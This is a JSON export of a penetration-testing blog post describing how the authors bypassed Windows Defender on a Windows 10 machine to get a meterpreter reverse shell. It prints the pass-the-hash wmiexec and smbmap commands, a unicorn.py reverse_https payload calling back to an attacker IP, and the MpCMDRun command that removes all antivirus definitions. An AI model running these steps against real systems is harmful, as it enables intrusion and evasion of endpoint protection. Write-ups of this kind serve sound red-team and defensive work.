{"id":9697,"date":"2019-01-23T23:42:55","date_gmt":"2019-01-24T04:42:55","guid":{"rendered":"https:\/\/www.elteni.com\/?p=9697"},"modified":"2019-01-23T23:42:55","modified_gmt":"2019-01-24T04:42:55","slug":"how-we-were-able-to-bypass-windows-defender-on-a-windows-10-machine-to-get-a-reverse-shell","status":"publish","type":"post","link":"https:\/\/www.elteni.com\/insights\/?p=9697","title":{"rendered":"How we were able to bypass Windows Defender on a Windows 10 machine to get a reverse shell!"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">It seems we just peaked your interest, right? Isn\u2019t that the reason you are here reading this? It\u2019s either that, or you are just trolling, you know who you are.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We\u2019ve experienced first-hand and have also heard from many of our fellow pen testers that anti-virus solutions, especially some of the next-gen solutions are easy to bypass using some creativity but when battling with <a href=\"https:\/\/www.microsoft.com\/en-us\/windows\/windows-defender\/\">Windows Defender<\/a>, it completely shuts them down, especially when trying to get that reverse shell. <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Let\u2019s set the scene for you; You&#8217;re testing a Windows 10 box; you get a user hash via <a href=\"https:\/\/github.com\/SpiderLabs\/Responder\">responder<\/a>; you cracked-it because the user\u2019s password still has the word \u201cwelcome\u201d in it; you sprayed the password and found a machine that the user is a local admin on (yes, unfortunately this is still the case), and you also found that <a href=\"https:\/\/github.com\/byt3bl33d3r\/CrackMapExec\">crackmapexec<\/a> listed a logged on domain admin account on the same box. You now technically have local admin access, so now you\u2019re on your journey to get that shell. Through some trial and error, you determine that you can\u2019t get a shell on that box using the easy methods; <a href=\"https:\/\/www.metasploit.com\/\">metasploit<\/a> modules psexec or psexec_psh. Why you ask? Because Windows Defender is on the box and it just shut you down. So now you move on to some other methods to try to gain some access, heck you have credentials that work, and it shouldn\u2019t be so difficult. Maybe you try some of the <a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\">impacket tools<\/a>, psexec.py, smbclient.py, wmiexec.py, etc. Tada, wmiexec.py gives you an interactive shell to the box and now your salivating, you\u2019re only steps away from getting domain admin. But wait, when you try to run some commands such as net stop windefend or sc stop windefend, you get \u201c<strong>ACCESS DENIED\u201d. <\/strong>Darn, how do you get a reverse shell if you can\u2019t force Windows Defender to stop. Maybe you can find the associated task and try a taskkill \/pid, but that won&#8217;t work. Maybe you moved on and created a custom payload using msfvenom and you encoded it, or maybe you used veil, then you tried to upload and execute it. There may be the tiniest of chances that Windows Defender doesn\u2019t detect it but through many of our tests we found that this is not the case. So now you sit there scratching your head and saying to yourself, well at least we got local admin access and we can access this person\u2019s email, their locally stored files, etc. That\u2019s good and all, but you\u2019re not satisfied because you didn\u2019t get domain admin. <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Ok, so we won\u2019t keep you waiting any longer, we\u2019ll tell you\nwhat we did and provide some screenshots along the way.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Here we are with local admin access and an interactive shell\nusing wmiexec.py. <\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-cyan-blue-color has-very-light-gray-background-color wp-block-paragraph\"><strong>Example:<\/strong> python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:aabbcc3e349e1b1cb4142f43ffddeeff\u2013 jane@192.168.20.2<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We generated a payload using <a href=\"https:\/\/github.com\/trustedsec\/unicorn\">Dave Kennedy\u2019s powershell downgrade tool \u2013 unicorn.py<\/a><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-cyan-blue-color has-very-light-gray-background-color wp-block-paragraph\"><strong>Example<\/strong>: python unicorn.py windows\/meterpreter\/reverse_https &nbsp;192.168.10.1 hta<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We used Shawn&#8217;s <a href=\"https:\/\/github.com\/ShawnDEvans\/smbmap\">smbmap<\/a> to copy the file to the machine.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-cyan-blue-color has-very-light-gray-background-color wp-block-paragraph\"><strong>Example<\/strong>: smbmap -u jane -p aad3b435b51404eeaad3b435b51404ee:aabbcc3e349e1b1cb4142f43ffddeeff -H 192.168.20.2 \u2013 upload \u2018link.hta\u2019 \u2018C$\\link.hta\u2019<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The above steps are just getting us prepped to execute our\npayload, so now let\u2019s move onto the juicy stuff, Windows Defender. <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Since there isn\u2019t a way to kill Defender, we found a way to\ninteract with it that allowed us to have it perform in the way we wanted, and\nyou\u2019d be surprised to know that it isn\u2019t a vulnerability per se, but a tool that\nwas supplied by Microsoft to be used for legitimate purposes. <\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/windows-defender-antivirus\/command-line-arguments-windows-defender-antivirus\">MpCMDRun.exe<\/a>\nis a tool used to automate Windows Defender tasks. Interesting to see there is\na command there that lets you restore the installed signature definitions to a\nprevious backup copy or to the original default set of signatures. Guess what\nwe did next. We ran the command:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MpCMDRun.exe -RemoveDefinitions -All<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The best part is what happened next, &nbsp;we set up our meterpreter session, executed\nthe link.hta payload, then boom, we got our reverse shell. Oh boy was that an\nexciting moment for us. <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Here are some compiled screenshots of the before and after<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Before: <\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">We clicked on this link to execute it.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"421\" height=\"43\" src=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/1.png\" alt=\"\" class=\"wp-image-9699\" srcset=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/1.png 421w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/1-300x31.png 300w\" sizes=\"auto, (max-width: 421px) 100vw, 421px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Our meterpreter listener is still listening\u2026\u2026\u2026\u2026\u2026\u2026<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"561\" height=\"32\" src=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/2.png\" alt=\"\" class=\"wp-image-9700\" srcset=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/2.png 561w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/2-300x17.png 300w\" sizes=\"auto, (max-width: 561px) 100vw, 561px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Windows Defender blocks the payload<\/p>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/3.png\" alt=\"\" class=\"wp-image-9701\" width=\"548\" height=\"253\" srcset=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/3.png 794w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/3-300x139.png 300w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/3-768x356.png 768w\" sizes=\"auto, (max-width: 548px) 100vw, 548px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"546\" height=\"599\" src=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/4.png\" alt=\"\" class=\"wp-image-9702\" srcset=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/4.png 546w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/4-273x300.png 273w\" sizes=\"auto, (max-width: 546px) 100vw, 546px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">After:<\/h2>\n\n\n\n<p class=\"has-text-color has-background has-vivid-cyan-blue-color has-very-light-gray-background-color wp-block-paragraph\">We run the \u201cMpCMDRun.exe -removedefinitions -all\u201d command,\nand then we execute our payload.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"698\" height=\"237\" src=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/5.png\" alt=\"\" class=\"wp-image-9703\" srcset=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/5.png 698w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/5-300x102.png 300w\" sizes=\"auto, (max-width: 698px) 100vw, 698px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">No threats showing up on Windows Defender<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"803\" height=\"372\" src=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/6.png\" alt=\"\" class=\"wp-image-9704\" srcset=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/6.png 803w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/6-300x139.png 300w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/6-768x356.png 768w\" sizes=\"auto, (max-width: 803px) 100vw, 803px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We get our reverse shell<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"989\" height=\"121\" src=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/7.png\" alt=\"\" class=\"wp-image-9705\" srcset=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/7.png 989w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/7-300x37.png 300w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/7-768x94.png 768w\" sizes=\"auto, (max-width: 989px) 100vw, 989px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And this is what Windows Defender looks like after we remove\nall of the definitions.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"799\" height=\"634\" src=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/8.png\" alt=\"\" class=\"wp-image-9706\" srcset=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/8.png 799w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/8-300x238.png 300w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/8-768x609.png 768w\" sizes=\"auto, (max-width: 799px) 100vw, 799px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Some additional notes \u2013 We tested MpCMDRun.exe&nbsp; as both a standard user and local administrator and found that local administrator access was required to run the MpCMDRun command.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"983\" height=\"126\" src=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/9.png\" alt=\"\" class=\"wp-image-9707\" srcset=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/9.png 983w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/9-300x38.png 300w, https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/9-768x98.png 768w\" sizes=\"auto, (max-width: 983px) 100vw, 983px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>It seems we just peaked your interest, right? Isn\u2019t that the reason you are here reading this? It\u2019s either that, or you are just trolling, you know who [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":9709,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,33,34,35,36],"tags":[],"class_list":["post-9697","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber","category-penetration-test","category-red-team","category-reverse-shell","category-unicorn"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>How we were able to bypass Windows Defender on a Windows 10 machine to get a reverse shell! - Insights<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.elteni.com\/insights\/?p=9697\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How we were able to bypass Windows Defender on a Windows 10 machine to get a reverse shell! - Insights\" \/>\n<meta property=\"og:description\" content=\"It seems we just peaked your interest, right? Isn\u2019t that the reason you are here reading this? It\u2019s either that, or you are just trolling, you know who [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.elteni.com\/insights\/?p=9697\" \/>\n<meta property=\"og:site_name\" content=\"Insights\" \/>\n<meta property=\"article:published_time\" content=\"2019-01-24T04:42:55+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/windows-10-computer.png\" \/>\n\t<meta property=\"og:image:width\" content=\"916\" \/>\n\t<meta property=\"og:image:height\" content=\"514\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Elteni\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elteni\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?p=9697#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?p=9697\"},\"author\":{\"name\":\"Elteni\",\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/#\\\/schema\\\/person\\\/e415dfcf12d1dc9ad6eca68055c5e075\"},\"headline\":\"How we were able to bypass Windows Defender on a Windows 10 machine to get a reverse shell!\",\"datePublished\":\"2019-01-24T04:42:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?p=9697\"},\"wordCount\":852,\"image\":{\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?p=9697#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/wp-content\\\/uploads\\\/2019\\\/01\\\/windows-10-computer.png\",\"articleSection\":[\"Cyber\",\"Penetration Test\",\"Red Team\",\"Reverse Shell\",\"Unicorn\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?p=9697\",\"url\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?p=9697\",\"name\":\"How we were able to bypass Windows Defender on a Windows 10 machine to get a reverse shell! - Insights\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?p=9697#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?p=9697#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/wp-content\\\/uploads\\\/2019\\\/01\\\/windows-10-computer.png\",\"datePublished\":\"2019-01-24T04:42:55+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/#\\\/schema\\\/person\\\/e415dfcf12d1dc9ad6eca68055c5e075\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?p=9697#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?p=9697\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?p=9697#primaryimage\",\"url\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/wp-content\\\/uploads\\\/2019\\\/01\\\/windows-10-computer.png\",\"contentUrl\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/wp-content\\\/uploads\\\/2019\\\/01\\\/windows-10-computer.png\",\"width\":916,\"height\":514,\"caption\":\"Windows Defender Bypass 10\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?p=9697#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.elteni.com\\\/insights\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"How we were able to bypass Windows Defender on a Windows 10 machine to get a reverse shell!\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/#website\",\"url\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/\",\"name\":\"Insights\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/#\\\/schema\\\/person\\\/e415dfcf12d1dc9ad6eca68055c5e075\",\"name\":\"Elteni\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/?s=96&d=mm&r=g\",\"caption\":\"Elteni\"},\"url\":\"https:\\\/\\\/www.elteni.com\\\/insights\\\/?author=2\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How we were able to bypass Windows Defender on a Windows 10 machine to get a reverse shell! - Insights","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.elteni.com\/insights\/?p=9697","og_locale":"en_US","og_type":"article","og_title":"How we were able to bypass Windows Defender on a Windows 10 machine to get a reverse shell! - Insights","og_description":"It seems we just peaked your interest, right? Isn\u2019t that the reason you are here reading this? It\u2019s either that, or you are just trolling, you know who [&hellip;]","og_url":"https:\/\/www.elteni.com\/insights\/?p=9697","og_site_name":"Insights","article_published_time":"2019-01-24T04:42:55+00:00","og_image":[{"width":916,"height":514,"url":"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/windows-10-computer.png","type":"image\/png"}],"author":"Elteni","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Elteni","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.elteni.com\/insights\/?p=9697#article","isPartOf":{"@id":"https:\/\/www.elteni.com\/insights\/?p=9697"},"author":{"name":"Elteni","@id":"https:\/\/www.elteni.com\/insights\/#\/schema\/person\/e415dfcf12d1dc9ad6eca68055c5e075"},"headline":"How we were able to bypass Windows Defender on a Windows 10 machine to get a reverse shell!","datePublished":"2019-01-24T04:42:55+00:00","mainEntityOfPage":{"@id":"https:\/\/www.elteni.com\/insights\/?p=9697"},"wordCount":852,"image":{"@id":"https:\/\/www.elteni.com\/insights\/?p=9697#primaryimage"},"thumbnailUrl":"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/windows-10-computer.png","articleSection":["Cyber","Penetration Test","Red Team","Reverse Shell","Unicorn"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.elteni.com\/insights\/?p=9697","url":"https:\/\/www.elteni.com\/insights\/?p=9697","name":"How we were able to bypass Windows Defender on a Windows 10 machine to get a reverse shell! - Insights","isPartOf":{"@id":"https:\/\/www.elteni.com\/insights\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.elteni.com\/insights\/?p=9697#primaryimage"},"image":{"@id":"https:\/\/www.elteni.com\/insights\/?p=9697#primaryimage"},"thumbnailUrl":"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/windows-10-computer.png","datePublished":"2019-01-24T04:42:55+00:00","author":{"@id":"https:\/\/www.elteni.com\/insights\/#\/schema\/person\/e415dfcf12d1dc9ad6eca68055c5e075"},"breadcrumb":{"@id":"https:\/\/www.elteni.com\/insights\/?p=9697#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.elteni.com\/insights\/?p=9697"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.elteni.com\/insights\/?p=9697#primaryimage","url":"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/windows-10-computer.png","contentUrl":"https:\/\/www.elteni.com\/insights\/wp-content\/uploads\/2019\/01\/windows-10-computer.png","width":916,"height":514,"caption":"Windows Defender Bypass 10"},{"@type":"BreadcrumbList","@id":"https:\/\/www.elteni.com\/insights\/?p=9697#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.elteni.com\/insights"},{"@type":"ListItem","position":2,"name":"How we were able to bypass Windows Defender on a Windows 10 machine to get a reverse shell!"}]},{"@type":"WebSite","@id":"https:\/\/www.elteni.com\/insights\/#website","url":"https:\/\/www.elteni.com\/insights\/","name":"Insights","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.elteni.com\/insights\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.elteni.com\/insights\/#\/schema\/person\/e415dfcf12d1dc9ad6eca68055c5e075","name":"Elteni","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/?s=96&d=mm&r=g","caption":"Elteni"},"url":"https:\/\/www.elteni.com\/insights\/?author=2"}]}},"_links":{"self":[{"href":"https:\/\/www.elteni.com\/insights\/index.php?rest_route=\/wp\/v2\/posts\/9697","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.elteni.com\/insights\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.elteni.com\/insights\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.elteni.com\/insights\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.elteni.com\/insights\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9697"}],"version-history":[{"count":0,"href":"https:\/\/www.elteni.com\/insights\/index.php?rest_route=\/wp\/v2\/posts\/9697\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.elteni.com\/insights\/index.php?rest_route=\/wp\/v2\/media\/9709"}],"wp:attachment":[{"href":"https:\/\/www.elteni.com\/insights\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9697"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.elteni.com\/insights\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9697"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.elteni.com\/insights\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9697"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}